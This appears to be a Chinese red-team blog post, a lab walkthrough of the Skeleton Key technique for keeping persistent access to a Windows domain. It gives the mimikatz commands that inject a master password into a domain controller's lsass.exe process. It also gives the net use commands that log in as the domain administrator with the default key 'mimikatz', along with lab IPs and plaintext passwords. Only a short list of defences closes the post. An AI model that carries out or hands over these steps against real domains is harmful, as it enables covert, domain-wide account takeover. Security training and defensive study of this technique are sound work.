查看域用户密码_Skeleton Key(万能密码)对域内权限维持

渗透攻击红队

一个专注于红队攻击的公众号

fe60545b76ac70d0f4640a00b95504b3.png

大家好,这里是 渗透攻击红队 的第 39 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

23883e98c81cd67961ab861f4a5dae37.gifSkeleton Key

使用 Skeleton Key(万能密码),可以对域内权限进行持久化操作。

使用 mimikatz 完成注入 Skeleon Key 的操作,将 Skeleton Key 注入域控制器的 lsass.exe 进程。

万能密码

实验环境

远程系统:

  • 域名:god.org

域控制器:

  • 主机名:OWA2010CN-God

  • IP地址:192.168.3.21

  • 用户名:administrator

  • 密码:Admin12345

域成员服务器:

  • 主机名:mary-PC

  • IP地址:192.168.3.25

  • 用户名:mary

  • 密码:admin!@#45


Mimikatz 中使用 Skeleton Key

尝试以当前登录用户身份列出域控制器 C 盘共享目录中的文件:

dir \\192.168.3.21\c$

981ae65827d564bad97eff728d563a45.png

因为此时是一个普通的域用户身份,所以系统提示权限不足!

这个时候使用域管理员账号和密码进行连接:

net use \\192.168.3.21\ipc$ "Admin12345" /user:god\administrator

8ffaa08ebd9d2123cd8834739600b717.png

连接成功,这个时候就列出了域控制器 C 盘的共享目录。

之后在域控制器中以管理员权限打开 mimikatz,输入命令将 Skeleton Key 注入域控制器的 lsass.exe 进程:

# 提升权限privilege::debug# 注入 skeleton keymisc::skeleton

5d3250676197dc63f2169312fc1ee6dc.png

这个时候系统提示 Skeleton Key 已经注入成功,此时会在域内的所有账号中添加一个 Skeleton Key,其密码默认为:“mimikatz”。

接下来就可以了使用域内任意用户的身份配合 Skeleton Key 进行域内身份授权验证了。

在不使用域管理员原始密码的情况下,使用注入的 Skeleton Key,同样可以成功连接系统:

# 查看现有 ipc$net use# 将之前建立的 ipc$ 删除net use \\192.168.3.21\ipc$ /del /y

b3749ade7bf07104de9cccd410ce1b38.png

输入命令,使用域管理员账号和 Skeleton Key 与域控制器建立 ipc$:

net use \\OWA2010CN-God\ipc$ "mimikatz" /user:god\administrator

a98cf1331cf4855d827a908f7c092f32.png

建立成功后这样就可以列出域控制器的共享目录了!


Skeleton Key 防御措施

  • 域管理员用户要设置强密码,确保恶意代码不会在域控制器中执行。

  • 在所有域用户中启用双因子认证,例如智能卡认证。

  • 启动应用程序白名单(例如 AppLocker),以限制 mimikatz 在域控制器中的运行。

PS:因为 Skeleton Key 是被注入到 lsass.exe 进程的,所以它只存在于内存中,如果域控制器重启,注入的 Skeleton Key 将会失效。

5e37889df21a6dddeb0ccae011aa796a.png

渗透攻击红队

一个专注于渗透红队攻击的公众号

d954d13212cb5710e8d3ebf0adb91807.png41130f3bd62813be7f0ab93a351df34d.png点分享9605191b1d76c768e1fc9991a26f6bd8.png点点赞477b236f66577a3fdc2671bcb216f53b.png点在看